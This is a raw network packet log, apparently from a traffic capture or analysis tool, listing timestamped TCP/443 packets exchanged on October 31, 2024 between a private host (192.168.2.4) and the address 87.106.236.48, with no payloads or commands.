                                                                                                                                            Oct 31, 2024 17:12:38.932528973 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.932571888 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.932934046 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.932957888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.932992935 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.932997942 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.933029890 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.933511019 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.933530092 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.933563948 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.933568954 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.933583975 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.933598995 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.957662106 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.957690001 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.957762957 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:38.957775116 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:38.957830906 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.005673885 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.005696058 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.005901098 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.005913973 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.005964041 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.007025957 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.007040024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.007101059 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.007106066 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.007133007 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.007693052 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.007707119 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.007759094 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.007765055 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.007786989 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.007805109 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.008466005 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.008481026 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.008529902 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.008533955 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.008564949 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.036145926 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.036178112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.036273956 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.036287069 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.036310911 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.036329031 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.036760092 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.036773920 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.036819935 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.036825895 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.036855936 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.037405014 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.037419081 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.037589073 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.037594080 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.037631035 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.038153887 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.038167000 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.038224936 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.038229942 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.038258076 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.038800001 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.038819075 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.038887024 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.038891077 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.038921118 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.039422035 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.039436102 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.039486885 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.039491892 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.039521933 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.049194098 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.049221992 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.049272060 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.049279928 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.049290895 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.049319029 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.049794912 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.049808979 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.049866915 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.049873114 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.049901962 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.050579071 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.050594091 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.050638914 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.050643921 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.050673008 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.051213980 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.051234961 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.051290989 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.051295996 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.051327944 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.074805021 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.074820995 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.074906111 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.074922085 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.074954987 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.123301983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.123347044 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.123413086 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.123480082 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.123514891 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.123533010 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.123816967 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.123831034 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.123893976 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.123899937 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.123934984 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.124495983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.124511003 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.124562979 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.124568939 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.124603033 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.124998093 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.125015974 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.125195026 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.125200033 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.125233889 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.153357029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.153381109 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.153518915 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.153527975 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.153564930 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.153944969 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.153958082 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.154007912 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.154011965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.154047966 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.155106068 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.155121088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.155147076 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.155152082 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.155183077 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.155200005 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.155476093 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.155489922 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.155539036 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.155543089 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.155580044 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.156209946 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.156223059 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.156261921 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.156266928 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.156301022 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.156781912 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.156796932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.156840086 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.156845093 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.156876087 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.166881084 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.166898966 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.166956902 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.166956902 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.166968107 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.166984081 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.167010069 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.167016029 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.167035103 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.167057037 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.167630911 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.167645931 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.167695999 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.167702913 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.167732954 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.168349981 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.168370008 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.168400049 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.168406010 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.168425083 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.168447018 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.191648006 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.191665888 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.191752911 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.191762924 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.191776991 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.191798925 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.240101099 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.240122080 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.240206957 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.240237951 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.240273952 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.240643978 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.240657091 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.240708113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.240722895 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.240761042 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.241516113 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.241530895 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.241585970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.241606951 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.241642952 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.241946936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.241962910 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.242007971 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.242022038 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.242060900 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.242754936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.242769003 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.242824078 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.242842913 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.242877960 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.277411938 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.277431965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.277587891 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.277631044 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.277673960 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.277873039 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.277887106 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.277925014 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.277934074 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.277962923 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.277981043 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.278554916 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.278569937 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.278599024 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.278609037 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.278628111 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.278650999 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.279495001 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.279509068 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.279561996 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.279567957 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.279578924 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.279592037 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.279613018 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.279619932 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.279635906 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.279650927 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.280479908 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.280493975 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.280548096 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.280560017 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.280594110 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.283309937 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.283339977 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.283387899 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.283406973 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.283442974 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.283885002 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.283905983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.283950090 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.283961058 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.283996105 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.285094976 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.285111904 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.285162926 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.285176992 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.285212040 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.285516024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.285528898 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.285574913 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.285583973 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.285619020 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.309015036 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.309067011 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.309221983 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.309257984 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.309288979 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.309298992 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.357038975 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.357064009 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.357215881 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.357228041 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.357269049 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.357623100 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.357676983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.357702017 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.357707024 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.357737064 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.357757092 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.358439922 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.358457088 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.358504057 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.358509064 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.358550072 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.358867884 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.358886957 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.358922958 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.358927965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.358952999 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.358972073 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.359481096 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.359503984 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.359574080 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.359580040 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.359620094 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.390171051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.390189886 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.390338898 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.390357018 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.390400887 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.390747070 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.390762091 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.390960932 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.390965939 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.391002893 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.391472101 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.391485929 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.391535044 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.391540051 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.391580105 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.392343044 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.392357111 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.392405987 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.392411947 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.392453909 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.392462969 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.392477036 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.392529011 CET49761443192.168.2.487.106.236.48
